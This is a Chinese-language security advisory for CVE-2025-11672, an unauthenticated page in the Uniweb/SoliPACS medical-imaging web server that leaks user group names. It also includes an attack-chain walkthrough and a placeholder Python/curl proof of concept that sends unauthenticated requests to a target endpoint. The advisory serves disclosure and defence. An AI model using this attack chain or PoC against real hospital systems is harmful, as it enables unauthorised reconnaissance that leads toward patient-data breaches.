CVE-2025-11672 EBM Technologies Uniweb/SoliPACS WebServer 缺失认证漏洞

漏洞信息

漏洞编号

CVE-2025-11672

漏洞类型

缺失认证（Missing Authentication）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EBM Technologies Uniweb/SoliPACS WebServer

漏洞概述

CVE-2025-11672 是 EBM Technologies 旗下 Uniweb/SoliPACS WebServer 产品中存在的一个缺失认证（Missing Authentication）安全漏洞。该漏洞由台湾计算机紧急响应中心（TWCERT/CC，[email protected]）发现并报告，披露日期为2025年10月13日。

Uniweb/SoliPACS WebServer 是一款医疗影像归档与通信系统（PACS）的Web服务端组件，广泛应用于医疗机构中用于管理和存储医学影像数据（如X光片、CT扫描、MRI等）。由于该系统在特定功能页面上未实施有效的身份认证机制，未经认证的远程攻击者可以直接通过网络访问这些页面，从而获取系统中的用户组名称信息。

根据CVSS 3.1评分标准，该漏洞的基础评分为5.3分，属于中等严重等级。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N）和用户交互（UI:N），对机密性产生低影响（C:L），对完整性和可用性无影响（I:N、A:N）。虽然该漏洞本身不会直接导致系统被攻陷或数据被篡改，但泄露的用户组信息可能被攻击者用于后续的定向攻击、社会工程学攻击或暴力破解等攻击活动，为更深入的系统入侵提供信息基础。

该漏洞的存在反映出医疗信息系统在访问控制方面的安全缺陷，尤其在医疗数据日益成为高价值攻击目标的背景下，此类信息泄露问题需要引起高度重视。

技术细节

该漏洞的核心问题在于 Uniweb/SoliPACS WebServer 的某个特定功能页面缺少必要的身份认证检查。在正常的Web应用架构中，受保护的页面或API端点应当通过会话管理、令牌验证或其他认证机制来确保只有合法用户才能访问。

漏洞原理：
1. WebServer 中存在一个用于显示或管理用户组信息的页面/接口；
2. 该页面/接口在服务端代码中没有正确实施认证检查或会话验证逻辑；
3. 攻击者只需构造特定的HTTP请求（如GET或POST请求），直接访问该页面的URL路径，即可绕过认证机制；
4. 服务器在未验证用户身份的情况下，直接返回包含用户组名称的响应数据。

利用方式：
- 攻击者无需任何凭据或会话令牌；
- 通过简单的HTTP请求（如使用curl、浏览器或自动化脚本）即可访问受影响的页面；
- 服务器返回的响应中包含系统中所有用户组的名称信息；
- 获取的用户组名称可用于后续的暴力破解、字典攻击或社会工程学攻击。

虽然该漏洞仅泄露用户组名称（属于低敏感度信息），但攻击者可以以此为起点，进一步探测系统的其他安全弱点，或结合其他漏洞实现更深层次的渗透。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过Shodan、Censys等网络空间搜索引擎或端口扫描工具，识别暴露在互联网上的 Uniweb/SoliPACS WebServer 实例，确定潜在的攻击目标。

STEP 2

步骤2：定位未认证页面

攻击者通过目录枚举、爬虫或参考已知URL结构，定位到缺少认证检查的特定功能页面（用于显示用户组信息的页面）。

STEP 3

步骤3：发送未认证请求

攻击者使用curl、浏览器或自定义脚本，直接向目标页面发送HTTP请求，无需提供任何凭据、会话令牌或认证头信息。

STEP 4

步骤4：获取用户组信息

服务器在未验证身份的情况下返回包含用户组名称的响应数据，攻击者成功获取系统中的用户组信息。

STEP 5

步骤5：信息利用与后续攻击

攻击者利用获取的用户组名称信息，结合暴力破解、社会工程学或其他漏洞，进一步渗透系统，可能获取更高权限或访问敏感医疗数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11672 - Uniweb/SoliPACS WebServer Missing Authentication PoC
# This PoC demonstrates how an unauthenticated attacker can access
# a specific page to obtain user group names.

import requests

# Target configuration
TARGET_URL = "http://target-host:port"  # Replace with actual target URL
# The specific endpoint that lacks authentication
# (path may vary depending on the specific version and configuration)
VULNERABLE_ENDPOINT = "/path/to/usergroup/page"  # Replace with actual endpoint

def exploit_missing_auth(target_url, endpoint):
    """
    Exploit CVE-2025-11672: Access user group information without authentication.
    """
    url = f"{target_url}{endpoint}"
    
    try:
        # Send unauthenticated GET request to the vulnerable page
        response = requests.get(url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Successfully accessed: {url}")
            print(f"[+] Response body:\n{response.text}")
            # Parse user group names from the response
            # The exact parsing logic depends on the response format
            return response.text
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2025-11672 PoC - Missing Authentication in Uniweb/SoliPACS WebServer")
    print(f"[*] Target: {TARGET_URL}")
    result = exploit_missing_auth(TARGET_URL, VULNERABLE_ENDPOINT)
    if result:
        print("[*] User group names obtained successfully.")
    else:
        print("[*] Exploit failed or target not vulnerable.")

# Simple curl command alternative:
# curl -v "http://target-host:port/path/to/usergroup/page"
# No authentication headers or cookies required.

影响范围

EBM Technologies Uniweb/SoliPACS WebServer（所有未修复的版本）

防御指南

临时缓解措施

在等待官方修复补丁发布之前，建议采取以下临时缓解措施：1）通过网络防火墙或访问控制列表（ACL）限制对 Uniweb/SoliPACS WebServer 的网络访问，仅允许可信的内部网络或VPN用户访问；2）在反向代理服务器上配置认证机制，要求访问特定页面时提供有效的凭据；3）部署Web应用防火墙（WAF）规则，检测和阻止异常的未认证访问请求；4）密切监控系统日志，及时发现和响应可疑的访问行为；5）参考TWCERT/CC发布的官方公告（https://www.twcert.org.tw/）获取最新的修复进展。